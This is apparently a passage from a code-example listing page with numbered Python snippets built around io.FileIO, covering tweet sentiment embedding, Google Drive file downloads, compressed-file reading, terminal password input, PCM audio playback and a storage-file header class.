    }
    neg_pattern = re.compile(r'\b(' + '|'.join(negations_dic.keys()) + r')\b')

    def tweet_cleaner_updated(text, tweet_len=100):
        soup = BeautifulSoup(text, 'lxml')
        souped = soup.get_text()
        try:
            bom_removed = souped.decode("utf-8-sig").replace(u"\ufffd", "?")
        except:
            bom_removed = souped
        stripped = re.sub(combined_pat, '', bom_removed)
        stripped = re.sub(www_pat, '', stripped)
        lower_case = stripped.lower()
        neg_handled = neg_pattern.sub(lambda x: negations_dic[x.group()],
                                      lower_case)
        letters_only = re.sub("[^a-zA-Z]", " ", neg_handled)

        lema = WordNetLemmatizer()
        # lancaster_stemmer = LancasterStemmer()
        words = list()
        for word in tok.tokenize(letters_only):
            if len(word) > 1 and word not in stopWords:
                # print('raw', word)
                lema_word = lema.lemmatize(word)
                # lema_word = lancaster_stemmer.stem(word)
                if len(lema_word) == 1:
                    lema_word = word
                # print('lem', lema_word)
                words.append(lema_word)
        if len(words) <= tweet_len:
            return words, (" ".join(words)).strip()

    def get_api_clean_tweets_df(screen_name, tweet_num=5, predict_model=''):
        auth = tweepy.OAuthHandler(consumer_key, consumer_secret)
        auth.set_access_token(access_key, access_secret)
        api = tweepy.API(auth)

        columns = ['Screen_Name', 'Time_Stamp', 'raw_tweet', 'text', 'tokens']
        tweet_df = pd.DataFrame(columns=columns)
        tweet_tokeenized = list()
        tweet_tokens = list()
        positive_tokens = list()
        tokens_positiveti_dict = dict()

        index = 0
        for status in tweepy.Cursor(api.user_timeline,
                                    screen_name=screen_name,
                                    tweet_mode="extended").items():
            clean_tweet = tweet_cleaner_updated(status.full_text)
            tweet_tokens += clean_tweet[0]
            tweet_tokeenized.append(clean_tweet[0])
            tweet_df.loc[index] = [
                status.user.screen_name, status.created_at, status.full_text,
                clean_tweet[1], clean_tweet[0]
            ]
            index += 1
            if index == tweet_num:
                break

        tweet_df['target'] = None

        loaded_model = pickle.load(open(predict_model, 'rb'))

        for index in range(len(tweet_df)):
            if tweet_df['text'][index] is np.nan:
                pass
            else:
                if int(loaded_model.predict(list([tweet_df['text'][index]
                                                  ]))) == 1:
                    tweet_df['target'][index] = 'Positive'
                else:
                    tweet_df['target'][index] = 'Negative'

        positive_tweet_df = tweet_df.loc[tweet_df['target'] == 'Positive']
        for row in positive_tweet_df.index:  # range(len(positive_tweet_df)):
            positive_tokens += positive_tweet_df['tokens'][row]

        tweet_tokens_set = set(tweet_tokens)
        for token in tweet_tokens_set:
            token_all_counter = tweet_tokens.count(token)
            token_pos_counter = positive_tokens.count(token)
            tokens_positiveti_dict[token] = int(token_pos_counter /
                                                token_all_counter * 100)

        tweet_df.drop(['Screen_Name', 'Time_Stamp', 'text', 'tokens'],
                      axis=1,
                      inplace=True)
        print(tweet_df)
        return tokens_positiveti_dict, tweet_tokens, tweet_tokeenized, tweet_df

    pos_tokens_dict, donalds_tokens_list, donalds_tokenized_tweets, donalds_df = \
        get_api_clean_tweets_df(user_screen_name, tweets_count, predict_model)

    cores = multiprocessing.cpu_count()

    user_model = Word2Vec(
        donalds_tokenized_tweets,
        min_count=1,
        size=200,
        workers=cores,
    )
    user_model.save("user_model")
    model = gensim.models.keyedvectors.KeyedVectors.load("user_model")

    max_size = len(model.wv.vocab) - 1
    w2v = np.zeros((max_size, model.layer1_size))

    with open("test/metadata.tsv", 'w+') as file_metadata:
        meta_word = ('word' + '\t' + 'Sentiment')
        file_metadata.write(meta_word + '\n')

    with open('tensors.tsv', 'w+') as tensors:
        with open("test/metadata.tsv", 'a') as file_metadata:
            for i, word in enumerate(model.wv.index2word[:max_size]):
                w2v[i] = model.wv[word]
                if pos_tokens_dict[word] < 50:
                    meta_word = word + '(' + str(
                        pos_tokens_dict[word]) + ')' + '\t' + str(0)
                    file_metadata.write(meta_word + '\n')
                else:
                    meta_word = word + '(' + str(
                        pos_tokens_dict[word]) + ')' + '\t' + str(100)
                    file_metadata.write(meta_word + '\n')
                vector_row = '\t'.join(map(str, model[word]))
                tensors.write(vector_row + '\n')

    sess = tf.InteractiveSession()

    with tf.device("/cpu:0"):
        embedding = tf.Variable(w2v, trainable=False, name='embedding')
        print(embedding)

    tf.global_variables_initializer().run()

    saver = tf.train.Saver()

    writer = tf.summary.FileWriter(path, sess.graph)

    config = projector.ProjectorConfig()
    embed = config.embeddings.add()
    embed.tensor_name = 'embedding'
    embed.metadata_path = 'metadata.tsv'

    projector.visualize_embeddings(writer, config)

    saver.save(sess, path + '/model.ckpt', global_step=max_size)
Example #15
def get_readable_fileobj(name_or_obj,
                         encoding=None,
                         cache=False,
                         show_progress=True,
                         remote_timeout=None):
    """
    Given a filename or a readable file-like object, return a context
    manager that yields a readable file-like object.

    This supports passing filenames, URLs, and readable file-like
    objects, any of which can be compressed in gzip or bzip2.

    Notes
    -----

    This function is a context manager, and should be used for example
    as::

        with get_readable_fileobj('file.dat') as f:
            contents = f.read()

    Parameters
    ----------
    name_or_obj : str or file-like object
        The filename of the file to access (if given as a string), or
        the file-like object to access.

        If a file-like object, it must be opened in binary mode.

    encoding : str, optional
        When `None` (default), returns a file-like object with a
        `read` method that on Python 2.x returns `bytes` objects and
        on Python 3.x returns `str` (`unicode`) objects, using
        `locale.getpreferredencoding()` as an encoding.  This matches
        the default behavior of the built-in `open` when no `mode`
        argument is provided.

        When `'binary'`, returns a file-like object where its `read`
        method returns `bytes` objects.

        When another string, it is the name of an encoding, and the
        file-like object's `read` method will return `str` (`unicode`)
        objects, decoded from binary using the given encoding.

    cache : bool, optional
        Whether to cache the contents of remote URLs.

    show_progress : bool, optional
        Whether to display a progress bar if the file is downloaded
        from a remote server.  Default is `True`.

    remote_timeout : float
        Timeout for remote requests in seconds (default is the configurable
        REMOTE_TIMEOUT, which is 3s by default)

    Returns
    -------
    file : readable file-like object
    """

    # close_fds is a list of file handles created by this function
    # that need to be closed.  We don't want to always just close the
    # returned file handle, because it may simply be the file handle
    # passed in.  In that case it is not the responsibility of this
    # function to close it: doing so could result in a "double close"
    # and an "invalid file descriptor" exception.
    close_fds = []
    delete_fds = []

    if remote_timeout is None:
        # use configfile default
        remote_timeout = REMOTE_TIMEOUT()

    # Get a file object to the content
    if isinstance(name_or_obj, six.string_types):
        if _is_url(name_or_obj):
            name_or_obj = download_file(name_or_obj,
                                        cache=cache,
                                        show_progress=show_progress,
                                        timeout=remote_timeout)
        if PY3K:
            fileobj = io.FileIO(name_or_obj, 'r')
        else:
            fileobj = open(name_or_obj, 'rb')
        close_fds.append(fileobj)
    else:
        fileobj = name_or_obj

    # Check if the file object supports random access, and if not,
    # then wrap it in a BytesIO buffer.  It would be nicer to use a
    # BufferedReader to avoid loading the whole file into memory first,
    # but that is not compatible with streams or urllib2.urlopen
    # objects on Python 2.x.
    if not hasattr(fileobj, 'seek'):
        fileobj = io.BytesIO(fileobj.read())

    # Now read enough bytes to look at signature
    signature = fileobj.read(4)
    fileobj.seek(0)

    if signature[:3] == b'\x1f\x8b\x08':  # gzip
        import struct
        try:
            from .compat import gzip
            fileobj_new = gzip.GzipFile(fileobj=fileobj, mode='rb')
            fileobj_new.read(1)  # need to check that the file is really gzip
        except (IOError, EOFError):  # invalid gzip file
            fileobj.seek(0)
            fileobj_new.close()
        except struct.error:  # invalid gzip file on Python 3
            fileobj.seek(0)
            fileobj_new.close()
        else:
            fileobj_new.seek(0)
            fileobj = fileobj_new
    elif signature[:3] == b'BZh':  # bzip2
        try:
            # bz2.BZ2File does not support file objects, only filenames, so we
            # need to write the data to a temporary file
            tmp = NamedTemporaryFile("wb", delete=False)
            tmp.write(fileobj.read())
            tmp.close()
            delete_fds.append(tmp)
            import bz2
            fileobj_new = bz2.BZ2File(tmp.name, mode='rb')
            fileobj_new.read(1)  # need to check that the file is really bzip2
        except IOError:  # invalid bzip2 file
            fileobj.seek(0)
            fileobj_new.close()
        else:
            fileobj_new.seek(0)
            close_fds.append(fileobj_new)
            fileobj = fileobj_new

    # By this point, we have a file, io.FileIO, gzip.GzipFile, or
    # bz2.BZ2File instance opened in binary mode (that is, read
    # returns bytes).  Now we need to, if requested, wrap it in a
    # io.TextIOWrapper so read will return unicode based on the
    # encoding parameter.

    if PY3K:
        needs_textio_wrapper = encoding != 'binary'
    else:
        needs_textio_wrapper = encoding != 'binary' and encoding is not None

    if needs_textio_wrapper:
        # A bz2.BZ2File can not be wrapped by a TextIOWrapper,
        # so we decompress it to a temporary file and then
        # return a handle to that.
        import bz2
        if isinstance(fileobj, bz2.BZ2File):
            tmp = NamedTemporaryFile("wb", delete=False)
            data = fileobj.read()
            tmp.write(data)
            tmp.close()
            delete_fds.append(tmp)
            if PY3K:
                fileobj = io.FileIO(tmp.name, 'r')
            else:
                fileobj = open(tmp.name, 'rb')
            close_fds.append(fileobj)

        # On Python 2.x, we need to first wrap the regular `file`
        # instance in a `io.FileIO` object before it can be
        # wrapped in a `TextIOWrapper`.  We don't just create an
        # `io.FileIO` object in the first place, because we can't
        # get a raw file descriptor out of it on Python 2.x, which
        # is required for the XML iterparser.
        if not PY3K and isinstance(fileobj, file):
            fileobj = io.FileIO(fileobj.fileno())

        fileobj = io.BufferedReader(fileobj)
        fileobj = io.TextIOWrapper(fileobj, encoding=encoding)

        # Ensure that file is at the start - io.FileIO will for
        # example not always be at the start:
        # >>> import io
        # >>> f = open('test.fits', 'rb')
        # >>> f.read(4)
        # 'SIMP'
        # >>> f.seek(0)
        # >>> fileobj = io.FileIO(f.fileno())
        # >>> fileobj.tell()
        # 4096L

        fileobj.seek(0)

    try:
        yield fileobj
    finally:
        for fd in close_fds:
            fd.close()
        for fd in delete_fds:
            os.remove(fd.name)
Example #16
    def download_file(self, file_id, download_directory_path, username):
        """
        Downloads the file for file_id to the given download_path.

        :param file_id:
        :param download_directory_path:
        :return: the full path to the downloaded file
        """
        googledrive_file = self.googledrive_api.files().get(
            fileId=file_id, fields="name, mimeType").execute()

        # convert utf-8 chars
        safe_filename = googledrive_file['name'].encode(
            sys.getfilesystemencoding(), 'ignore')
        file_download_path = os.path.join(download_directory_path,
                                          safe_filename)
        logger.debug('Download file %s <= googledrive://file/%s',
                     file_download_path, file_id)

        if 'vnd.google-apps' in googledrive_file['mimeType']:
            # if googledrive_file['mimeType'] == 'application/vnd.google-apps.spreadsheet':
            #     mimeType = 'application/vnd.openxmlformats-officedocument.spreadsheetml.sheet'
            # elif googledrive_file['mimeType'] == 'application/vnd.google-apps.document':
            #     mimeType = 'application/vnd.openxmlformats-officedocument.wordprocessingml.document'
            # elif googledrive_file['mimeType'] == 'application/vnd.google-apps.presentation':
            #     mimeType = 'application/vnd.openxmlformats-officedocument.presentationml.presentation'
            # else:
            n = Notification(
                event_type='data',
                status=Notification.ERROR,
                operation='googledrive_download_error',
                message=
                'Copying Google-type files is currently unsupported. Export the file to'
                ' a standard format and try again.',
                user=username,
                extra={
                    'path':
                    "'{}' of type {}".format(googledrive_file['name'],
                                             googledrive_file['mimeType'])
                })
            n.save()
            return None

        request = self.googledrive_api.files().get_media(fileId=file_id)

        # Incremental Partial Download
        fh = io.FileIO(file_download_path, 'wb')
        downloader = MediaIoBaseDownload(fh, request)
        done = False
        backoff_attempts = 0
        while done is False:
            try:
                status, done = downloader.next_chunk()
                # logger.debug('status: {} percent'.format(status.progress()))
            except HttpError as e:
                # Incremental backoff for exceeding google api rate limit
                if "Rate Limit Exceeded" in str(e):
                    logger.debug('RATE LIMIT EXCEEDED')
                    backoff_attempts += 1
                    time.sleep(backoff_attempts)
                    if backoff_attempts > 10:
                        n = Notification(
                            event_type='data',
                            status=Notification.ERROR,
                            operation='googledrive_download_error',
                            message=
                            'Rate Limit Exceeded. Try again after a few minutes for this file.',
                            user=username,
                            extra={
                                'path': "{}".format(googledrive_file['name'])
                            })
                        n.save()
                        return None
                elif "Only files with binary content can be downloaded" in str(
                        e):
                    n = Notification(
                        event_type='data',
                        status=Notification.ERROR,
                        operation='googledrive_download_error',
                        message=
                        'Only files with binary content can be downloaded. Convert the file to'
                        ' a standard format and try again.',
                        user=username,
                        extra={
                            'path':
                            "'{}' of type {}".format(
                                googledrive_file['name'],
                                googledrive_file['mimeType'])
                        })
                    n.save()
                    return None
                else:
                    raise

        fh.close()

        return file_download_path
Example #17
def download(service, file, destination, skip=False, noiter=False):
    # file is a dictionary with file id as well as name
    if skip and os.path.exists(os.path.join(destination, file['name'])):
        return -1
    mimeType = file['mimeType']
    if "application/vnd.google-apps" in mimeType:
        if "form" in mimeType: return -1
        elif "document" in mimeType:
            dlfile = service.files().export_media(
                fileId=file['id'],
                mimeType=
                'application/vnd.openxmlformats-officedocument.wordprocessingml.document'
            )
        elif "spreadsheet" in mimeType:
            dlfile = service.files().export_media(
                fileId=file['id'],
                mimeType=
                'application/vnd.openxmlformats-officedocument.spreadsheetml.sheet'
            )
        elif "presentation" in mimeType:
            dlfile = service.files().export_media(
                fileId=file['id'],
                mimeType=
                'application/vnd.openxmlformats-officedocument.presentationml.presentation'
            )
        else:
            dlfile = service.files().export_media(fileId=file['id'],
                                                  mimeType='application/pdf')
    else:
        dlfile = service.files().get_media(fileId=file['id'],
                                           supportsAllDrives=True,
                                           acknowledgeAbuse=True)
    rand_id = str(uuid.uuid4())
    os.makedirs('buffer', exist_ok=True)
    fh = io.FileIO(os.path.join('buffer', rand_id), 'wb')
    downloader = MediaIoBaseDownload(fh, dlfile, chunksize=CHUNK_SIZE)
    if noiter:
        print(f"{Fore.GREEN}Downloading{Style.RESET_ALL} {file['name']} ...")
    done = False
    rate_limit_count = 0
    while done is False and rate_limit_count < 20:
        try:
            status, done = downloader.next_chunk()
        except Exception as ex:
            DEBUG_STATEMENTS.append(
                f'File Name: {file["name"]}, File ID: {file["id"]}, Exception: {ex}'
            )
            rate_limit_count += 1
    fh.close()
    if noiter and rate_limit_count == 20:
        print(f"{Fore.RED}Error      {Style.RESET_ALL} {file['name']} ...")
    os.makedirs(destination, exist_ok=True)
    while True:
        try:
            shutil.move(os.path.join('buffer', rand_id),
                        os.path.join(destination, file['name']))
            break
        except PermissionError:
            # wait out the file write before attempting to move
            pass
    return rate_limit_count
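
A minimal usage sketch (not part of the snippet above): it assumes an already-authorized Drive v3 `service`, plus the module-level `CHUNK_SIZE`, `DEBUG_STATEMENTS`, and colorama globals the function expects; the folder query is a placeholder.

# Hypothetical caller: list the files in one folder and download each of them.
results = service.files().list(
    q="'FOLDER_ID' in parents",          # placeholder parent-folder id
    fields="files(id, name, mimeType)").execute()
for entry in results.get('files', []):
    retries = download(service, entry, destination="downloads", skip=True)
    if retries == -1:
        print(f"Skipped {entry['name']}")
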
Ejemplo n.º 18
0
print("-----------------------------------------------------")
for filepath in files:
    data = open(filepath, "r", encoding="utf-8")
    s = s + 1
    start = True
    Fussnoten = False  # "Fussnoten" (German) = footnotes

    ## process lines
    for line in data:
        ## get title
        done = False
        if filepath in firstsite and start:
            if not os.path.exists("out/" + sys.argv[1]):
                os.makedirs("out/" + sys.argv[1])

            with io.FileIO("./out/" + sys.argv[1] + "/" + titleN + ".txt",
                           "w") as file:
                file.write(article.encode("utf-8"))

            if not os.path.exists("out_notes/" + sys.argv[1]):
                os.makedirs("out_notes/" + sys.argv[1])

            with io.FileIO(
                    "./out_notes/" + sys.argv[1] + "/" + titleN + ".txt",
                    "w") as file:
                file.write(notes.encode("utf-8"))

            titleN = title[a]
            titleN = titleN[:-1]
            article = ""
            notes = ""
            article += title[a]
Ejemplo n.º 19
0
from google.colab import auth
auth.authenticate_user()
drive_service = build('drive', 'v3')

#File Download

!rm -f *.zip *.csv

#!kaggle competitions download -c jigsaw-toxic-comment-classification-challenge
#train.csv download
results = drive_service.files().list(q="name = 'train.csv.zip'", fields="files(id)").execute()
kaggle_api_key = results.get('files', [])
filename = "/content/train.csv.zip"
os.makedirs(os.path.dirname(filename), exist_ok=True)
request = drive_service.files().get_media(fileId=kaggle_api_key[0]['id'])
fh = io.FileIO(filename, 'wb')
downloader = MediaIoBaseDownload(fh, request)
done = False
while done is False:
    status, done = downloader.next_chunk()
    print("train.csv.zip - Download %d%%." % int(status.progress() * 100))
os.chmod(filename, 0o600)  # octal permissions; 600 (decimal) would set odd mode bits

#test.csv download
results = drive_service.files().list(q="name = 'test.csv.zip'", fields="files(id)").execute()
kaggle_api_key = results.get('files', [])
filename = "/content/test.csv.zip"
os.makedirs(os.path.dirname(filename), exist_ok=True)
request = drive_service.files().get_media(fileId=kaggle_api_key[0]['id'])
fh = io.FileIO(filename, 'wb')
downloader = MediaIoBaseDownload(fh, request)
done = False
while done is False:
    status, done = downloader.next_chunk()
    print("test.csv.zip - Download %d%%." % int(status.progress() * 100))
os.chmod(filename, 0o600)
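
A small follow-up sketch, not part of the original cell: extracting the two downloaded archives with the standard-library zipfile module.

import zipfile

for archive in ("/content/train.csv.zip", "/content/test.csv.zip"):
    with zipfile.ZipFile(archive) as zf:
        zf.extractall("/content")   # yields train.csv and test.csv
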
Ejemplo n.º 20
0
 def open_read(self, path, mode="r"):
     return FileWrapper(io.BufferedReader(io.FileIO(path, mode)))
Ejemplo n.º 21
0
async def download_gdrive(gdrive, service, uri):
    reply = ""
    global is_cancelled
    if not isdir(TEMP_DOWNLOAD_DIRECTORY):
        os.mkdir(TEMP_DOWNLOAD_DIRECTORY)
    if "&export=download" in uri:
        uri = uri.split("&export=download")[0]
    elif "file/d/" in uri and "/view" in uri:
        uri = uri.split("?usp=drivesdk")[0]
    try:
        file_Id = uri.split("uc?id=")[1]
    except IndexError:
        try:
            file_Id = uri.split("open?id=")[1]
        except IndexError:
            if "/view" in uri:
                file_Id = uri.split("/")[-2]
            else:
                try:
                    file_Id = uri.split("uc?export=download&confirm=")[1].split("id=")[
                        1
                    ]
                except IndexError:
                    file_Id = uri
    try:
        file = await get_information(service, file_Id)
    except HttpError as e:
        if "404" in str(e):
            drive = "https://drive.google.com"
            url = f"{drive}/uc?export=download&id={file_Id}"

            session = requests.session()
            download = session.get(url, stream=True)

            try:
                download.headers["Content-Disposition"]
            except KeyError:
                page = BeautifulSoup(download.content, "lxml")
                try:
                    export = drive + page.find("a", {"id": "uc-download-link"}).get(
                        "href"
                    )
                except AttributeError:
                    try:
                        error = (
                            page.find("p", {"class": "uc-error-caption"}).text
                            + "\n"
                            + page.find("p", {"class": "uc-error-subcaption"}).text
                        )
                    except Exception:
                        reply += (
                            "`[FILE - ERROR]`\n\n"
                            "`Status` : **BAD** - failed to download.\n"
                            "`Reason` : uncaught err."
                        )
                    else:
                        reply += (
                            "`[FILE - ERROR]`\n\n"
                            "`Status` : **BAD** - failed to download.\n"
                            f"`Reason` : {error}"
                        )
                    return reply
                download = session.get(export, stream=True)
                file_size = human_to_bytes(
                    page.find("span", {"class": "uc-name-size"})
                    .text.split()[-1]
                    .strip("()")
                )
            else:
                file_size = int(download.headers["Content-Length"])

            file_name = re.search(
                'filename="(.*)"', download.headers["Content-Disposition"]
            ).group(1)
            file_path = TEMP_DOWNLOAD_DIRECTORY + file_name
            with io.FileIO(file_path, "wb") as files:
                CHUNK_SIZE = None
                current_time = time.time()
                display_message = None
                first = True
                is_cancelled = False
                for chunk in download.iter_content(CHUNK_SIZE):
                    if is_cancelled:
                        raise CancelProcess

                    if not chunk:
                        break

                    diff = time.time() - current_time
                    if first:
                        downloaded = len(chunk)
                        first = False
                    else:
                        downloaded += len(chunk)
                    percentage = downloaded / file_size * 100
                    speed = round(downloaded / diff, 2)
                    eta = round((file_size - downloaded) / speed)
                    prog_str = "[{0}{1}] `{2}%`".format(
                        "".join("█" for i in range(math.floor(percentage / 10))),
                        "".join("░" for i in range(10 - math.floor(percentage / 10))),
                        round(percentage, 2),
                    )
                    current_message = (
                        f"{file_name} - Downloading\n"
                        f"{prog_str}\n"
                        f"`Size:` {humanbytes(downloaded)} of {humanbytes(file_size)}"
                        f"`Speed:` {humanbytes(speed)}`\n"
                        f"`ETA:` {time_formatter(eta)}"
                    )
                    if (
                        round(diff % 15.00) == 0
                        and (display_message != current_message)
                        or (downloaded == file_size)
                    ):
                        await gdrive.edit(current_message)
                        display_message = current_message
                    files.write(chunk)
    else:
        file_name = file.get("name")
        mimeType = file.get("mimeType")
        if mimeType == "application/vnd.google-apps.folder":
            await gdrive.edit("`Aborting, folder download not support...`")
            return False
        file_path = TEMP_DOWNLOAD_DIRECTORY + file_name
        request = service.files().get_media(fileId=file_Id, supportsAllDrives=True)
        with io.FileIO(file_path, "wb") as df:
            downloader = MediaIoBaseDownload(df, request)
            complete = False
            is_cancelled = False
            current_time = time.time()
            display_message = None
            while not complete:
                if is_cancelled:
                    raise CancelProcess

                status, complete = downloader.next_chunk()
                if status:
                    file_size = status.total_size
                    diff = time.time() - current_time
                    downloaded = status.resumable_progress
                    percentage = downloaded / file_size * 100
                    speed = round(downloaded / diff, 2)
                    eta = round((file_size - downloaded) / speed)
                    prog_str = " [{0}{1}] `{2}%`".format(
                        "".join("█" for i in range(math.floor(percentage / 10))),
                        "".join("░" for i in range(10 - math.floor(percentage / 10))),
                        round(percentage, 2),
                    )
                    current_message = (
                        f"{file_name} - Downloading\n"
                        f"{prog_str}\n"
                        f"`Size:` {humanbytes(downloaded)} of {humanbytes(file_size)}"
                        f"`Speed:` {humanbytes(speed)}`\n"
                        f"`ETA:` {time_formatter(eta)}"
                    )
                    if (
                        round(diff % 15.00) == 0
                        and (display_message != current_message)
                        or (downloaded == file_size)
                    ):
                        await gdrive.edit(current_message)
                        display_message = current_message
    await gdrive.edit(
        "`[FILE - DOWNLOAD]`\n\n"
        f"`Name   :` `{file_name}`\n"
        f"`Size   :` `{humanbytes(file_size)}`\n"
        f"`Path   :` `{file_path}`\n"
        "`Status :` **OK** - Successfully downloaded."
    )
    msg = await gdrive.respond("`Answer the question in your BOTLOG group`")
    async with gdrive.client.conversation(BOTLOG_CHATID) as conv:
        ask = await conv.send_message("`Proceed with mirroring? [y/N]`")
        try:
            r = conv.wait_event(events.NewMessage(outgoing=True, chats=BOTLOG_CHATID))
            r = await r
        except Exception:
            ans = "N"
        else:
            ans = r.message.message.strip()
            await gdrive.client.delete_messages(BOTLOG_CHATID, r.id)
        await gdrive.client.delete_messages(gdrive.chat_id, msg.id)
        await gdrive.client.delete_messages(BOTLOG_CHATID, ask.id)
    if ans.capitalize() == "N":
        return reply
    elif ans.capitalize() == "Y":
        try:
            result = await upload(gdrive, service, file_path, file_name, mimeType)
        except CancelProcess:
            reply += (
                "`[FILE - CANCELLED]`\n\n"
                "`Status` : **OK** - received signal cancelled."
            )
        else:
            reply += (
                "`[FILE - UPLOADED]`\n\n"
                f"`Name   :` `{file_name}`\n"
                f"`Size   :` `{humanbytes(result[0])}`\n"
                f"`Link   :` [{file_name}]({result[1]})\n"
                "`Status :` **OK**\n\n"
            )
        return reply
    else:
        await gdrive.client.send_message(
            BOTLOG_CHATID, "`Invalid answer type [Y/N] only...`"
        )
        return reply
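
The ID-extraction branches at the top of download_gdrive can be read in isolation; this is a standalone sketch of the same logic for the common Drive URL shapes (the helper name is illustrative, not from the original).

def extract_drive_file_id(uri):
    # Mirrors the parsing above: strip export/view suffixes, then try the
    # known query-parameter forms before falling back to the raw string.
    if "&export=download" in uri:
        uri = uri.split("&export=download")[0]
    elif "file/d/" in uri and "/view" in uri:
        uri = uri.split("?usp=drivesdk")[0]
    for marker in ("uc?id=", "open?id="):
        if marker in uri:
            return uri.split(marker)[1]
    if "/view" in uri:
        return uri.split("/")[-2]
    if "uc?export=download&confirm=" in uri:
        return uri.split("id=")[1]
    return uri
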
Ejemplo n.º 22
0
'''
Created on May 21, 2018

@author: venkateshwara.d
'''
import os
from selenium import webdriver
import io

chrome_driver_path = os.path.abspath('..') + "\\Drivers\\chromedriver.exe"

driver = webdriver.Chrome(chrome_driver_path)

driver.get('https://python.org')

html = driver.page_source

if os.path.isfile("pageSource.txt"):
    os.remove("pageSource.txt")

with io.FileIO("pageSource.txt", "w") as file:
    file.write(html.encode("utf-8"))

driver.close()
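
For comparison, a pathlib-based sketch (not in the original) that performs the same overwrite-and-encode step in one call:

from pathlib import Path

Path("pageSource.txt").write_text(html, encoding="utf-8")
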
Ejemplo n.º 23
0
def unix_getpass(prompt='Password: ', stream=None):
    """Prompt for a password, with echo turned off."""
    passwd = None
    with contextlib.ExitStack() as stack:
        try:
            # Always try reading and writing directly on the tty first.
            fd = os.open('/dev/tty', os.O_RDWR | os.O_NOCTTY)
            tty = io.FileIO(fd, 'w+')
            stack.enter_context(tty)
            input = io.TextIOWrapper(tty)
            stack.enter_context(input)
            if not stream:
                stream = input
        except OSError as e:
            # If that fails, see if stdin can be controlled.
            stack.close()
            try:
                fd = sys.stdin.fileno()
            except (AttributeError, ValueError):
                fd = None
                passwd = fallback_getpass(prompt, stream)
            input = sys.stdin
            if not stream:
                stream = sys.stderr

        if fd is not None:
            try:
                old = termios.tcgetattr(fd)  # a copy to save
                new = old[:]
                new[3] &= ~termios.ECHO  # 3 == 'lflags'
                tcsetattr_flags = termios.TCSAFLUSH
                if hasattr(termios, 'TCSASOFT'):
                    tcsetattr_flags |= termios.TCSASOFT
                try:
                    termios.tcsetattr(fd, tcsetattr_flags, new)
                    passwd = _raw_input(prompt, stream, input=input)
                finally:
                    termios.tcsetattr(fd, tcsetattr_flags, old)
                    stream.flush()  # issue7208
            except termios.error:
                if passwd is not None:
                    # _raw_input succeeded.  The final tcsetattr failed.  Reraise
                    # instead of leaving the terminal in an unknown state.
                    raise
                # We can't control the tty or stdin.  Give up and use normal IO.
                # fallback_getpass() raises an appropriate warning.
                if stream is not input:
                    # clean up unused file objects before blocking
                    stack.close()
                passwd = fallback_getpass(prompt, stream)

        stream.write('\n')
        return passwd
Ejemplo n.º 24
0
def _readline(fd):
    """Read one line.  May block forever if no newline is read."""
    reader = io.FileIO(fd, mode='rb', closefd=False)
    return reader.readline()
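
A short usage sketch: because closefd=False, the descriptor stays under the caller's control after the read (the pipe is only for illustration).

import os

r, w = os.pipe()
os.write(w, b"first line\nsecond line\n")
print(_readline(r))          # b'first line\n'; r is still open afterwards
os.close(r)
os.close(w)
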
Ejemplo n.º 25
0
 def __init__(self, path):
     self._path = path
     fd = os.open(path, os.O_RDWR | os.O_DIRECT)
     self._file = io.FileIO(fd, "r+", closefd=True)
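
A cautionary sketch, assuming Linux and a throwaway path (neither is from the original class): O_DIRECT transfers need block-aligned buffers, which mmap-backed memory satisfies.

import io
import mmap
import os

fd = os.open("/tmp/direct.bin", os.O_RDWR | os.O_CREAT | os.O_DIRECT)
f = io.FileIO(fd, "r+", closefd=True)
buf = mmap.mmap(-1, 4096)    # anonymous mapping => page-aligned, block-sized
f.readinto(buf)              # 0 bytes for an empty file, but the call is legal
f.close()
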
Ejemplo n.º 26
0
import pyaudio
import io, sys

p = pyaudio.PyAudio()

try:
    filename = sys.argv[1]
except IndexError:
    print(
        'ERROR: Usage - python playfile.py <filename> (e.g. python playfile.py voiceC'
    )
    sys.exit(1)

data_file = io.FileIO('./sound/{}.pcm'.format(filename), mode='r')

FORMAT = p.get_format_from_width(width=2)
CHANNELS = 1
RATE = 16000
CHUNK = 16000

stream = p.open(format=FORMAT,
                channels=CHANNELS,
                rate=RATE,
                output=True,
                frames_per_buffer=CHUNK)

print('playing...')

data = data_file.readall()
stream.write(data)

stream.stop_stream()
stream.close()
p.terminate()
Ejemplo n.º 27
0
def unix_getpass(prompt='Password: ', stream=None):
    passwd = None
    with contextlib.ExitStack() as stack:
        try:
            fd = os.open('/dev/tty', os.O_RDWR | os.O_NOCTTY)
            tty = io.FileIO(fd, 'w+')
            stack.enter_context(tty)
            input = io.TextIOWrapper(tty)
            stack.enter_context(input)
            if not stream:
                stream = input
        except OSError as e:
            try:
                stack.close()
                try:
                    fd = sys.stdin.fileno()
                except (AttributeError, ValueError):
                    fd = None
                    passwd = fallback_getpass(prompt, stream)

                input = sys.stdin
                if not stream:
                    stream = sys.stderr
            finally:
                e = None
                del e

        if fd is not None:
            try:
                old = termios.tcgetattr(fd)
                new = old[:]
                new[3] &= ~termios.ECHO
                tcsetattr_flags = termios.TCSAFLUSH
                if hasattr(termios, 'TCSASOFT'):
                    tcsetattr_flags |= termios.TCSASOFT
                try:
                    termios.tcsetattr(fd, tcsetattr_flags, new)
                    passwd = _raw_input(prompt, stream, input=input)
                finally:
                    termios.tcsetattr(fd, tcsetattr_flags, old)
                    stream.flush()

            except termios.error:
                if passwd is not None:
                    raise
                if stream is not input:
                    stack.close()
                passwd = fallback_getpass(prompt, stream)

        stream.write('\n')
        return passwd
Ejemplo n.º 28
0
    def __init__(self, **kwargs):
        other = kwargs.get("other", None)
        if other:
            self.fromOther(other)

        else:
            self.bufferPool = kwargs.get("bufferPool", None)
            if self.bufferPool is None:
                raise ValueError(
                    "No buffer pool found when initializing a storage file")

            fileId = kwargs.get("fileId", None)
            filePath = kwargs.get("filePath", None)
            mode = kwargs.get("mode", None)
            existing = os.path.exists(filePath)

            if fileId and filePath:
                initHeader = False
                initFreePages = False

                if not existing and mode.lower() == "create":
                    ioMode = "w+b"
                    pageSize = kwargs.get("pageSize", io.DEFAULT_BUFFER_SIZE)
                    pageClass = kwargs.get("pageClass",
                                           StorageFile.defaultPageClass)
                    schema = kwargs.get("schema", None)
                    if pageSize and pageClass and schema:
                        self.header = FileHeader(pageSize=pageSize,
                                                 pageClass=pageClass,
                                                 schema=schema)
                        initHeader = True
                        initFreePages = False
                    else:
                        raise ValueError(
                            "No page size, class or schema specified when creating a new storage file"
                        )

                elif existing and mode.lower() in ["update", "truncate"]:
                    ioMode = "r+b" if mode.lower() == "update" else "w+b"
                    f = io.BufferedReader(io.FileIO(filePath))
                    self.header = FileHeader.fromFile(f)
                    pageSize = self.pageSize()
                    initFreePages = True
                    f.close()

                else:
                    raise ValueError(
                        "Incompatible storage file mode and on-disk file status"
                    )

                if self.header:
                    self.fileId = fileId
